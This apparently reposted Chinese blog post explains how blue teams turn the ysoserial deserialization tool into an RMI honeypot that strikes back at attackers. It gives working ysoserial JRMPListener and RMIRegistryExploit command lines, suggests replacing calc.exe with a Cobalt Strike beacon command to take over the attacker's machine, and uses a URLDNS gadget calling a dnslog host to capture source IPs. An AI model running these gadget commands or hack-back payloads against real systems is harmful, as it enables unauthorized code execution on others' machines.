蓝队溯源之使用ysoserial反序列化利用工具搭建蜜罐

admin 2025年6月16日00:22:48评论34 views字数 1520阅读5分4秒阅读模式

 Part1 前言 

今天查阅了一下Java反序列化漏洞利用中常用的工具ysoserial,发现网上一些文章也对其反制方法进行了研究,今天写文章把复现过程和payload分享给大家。

以往蓝队溯源反制文章回顾:

第120篇:蓝队溯源之蚁剑、sqlmap、Goby反制方法的复现与分析

第125篇:蓝队溯源之burpsuite、zap、AWVS、xray扫描器反制方法与复现

 Part2 技术研究过程 

  • 使用ysoserial工具搭建蜜罐服务器

该方法源于公众号"赛博回忆录"的“白白白”中讲解的,大致原理是可以使用ysoserial工具布置一个蜜罐服务,一旦攻击者使用rmi反序列化漏洞去攻击RMI服务,那么攻击者的电脑就会被反打。大致流程如下:受害者在vps上搭建一JRMPListener,上面的1099端口绑定了一个恶意对象,比如执行弹计算器calc.exe命令。攻击者此时通过RMIRegistryExploit1099端口进行了RMI反序列化漏洞的利用,此时RMIRegistryExploit会收到受害者JRMPListener提供的恶意的gadget对象,攻击者对此对象进行反序列化,从而触发代码执行弹出calc.exe计算器,攻击者自己打了自己。

接下来测试一下:首先选一个大家最常用的利用链,比如CommonsCollectionsK1CommonsBeanutilsShiro183等。

java -cp ysoserial-1.7.jar ysoserial.exploit.JRMPListener 1099 CommonsCollectionsK1 calc.exe

蓝队溯源之使用ysoserial反序列化利用工具搭建蜜罐

接下来使用ysoserial的ysoserial.exploit.RMIRegistryExploit模块对此1099端口的RMI服务进行漏洞利用,发现攻击者的电脑弹出计算器来,我们也可以换成CS上线的命令,反控攻击者的电脑

java -cp ysoserial-1.7.jar ysoserial.exploit.RMIRegistryExploit 192.168.237.1 1099 CommonsCollectionsK1 whoami

蓝队溯源之使用ysoserial反序列化利用工具搭建蜜罐

或者使用一个RMI反序列化漏洞利用工具进行利用,点击Connect按钮,就会触发弹出计算器。

蓝队溯源之使用ysoserial反序列化利用工具搭建蜜罐

如果我们不知道攻击者使用的RMI工具中内置哪些可用的利用链jar包,那么可以使用URLDNS这种大多数JDK都自带的利用链去获取攻击者的源IP,具体操作如下:

java -cp ysoserial-1.7.jar ysoserial.exploit.JRMPListener 1099 URLDNS http://www.attacker33333.jyokk0.dnslog.cn

接下来使用attackRMI工具测试一下,发现我们的DNSLog服务成功收到的请求。

蓝队溯源之使用ysoserial反序列化利用工具搭建蜜罐

接下来使用另一款RMI漏洞利用工具测试一下,发现DNSLog服务同样成功收到了DNS请求。

蓝队溯源之使用ysoserial反序列化利用工具搭建蜜罐
  • ysoserial的gadget泄露攻击者计算机路径

这个是之前的同事“回忆飘如雪”发现的,是ysoserialgadget中的BeanShell1利用链存在的问题,其生成的序列化文件会包含攻击者的计算机路径,计算机路径中有计算机名。因此当攻击者使用BeanShell1这个利用链来打java反序列化漏洞的时候,会在数据包中泄露计算机ID名,从而泄露真实身份。

蓝队溯源之使用ysoserial反序列化利用工具搭建蜜罐

 Part3 总结 

 这篇文章分享的ysoserial蓝队溯源反制方法,至今仍然具有可行性和实战性,大家可以测试研究下。

原文始发于微信公众号(Z2O安全攻防):蓝队溯源之使用ysoserial反序列化利用工具搭建蜜罐

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月16日00:22:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   蓝队溯源之使用ysoserial反序列化利用工具搭建蜜罐http://cn-sec.com/archives/4168381.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息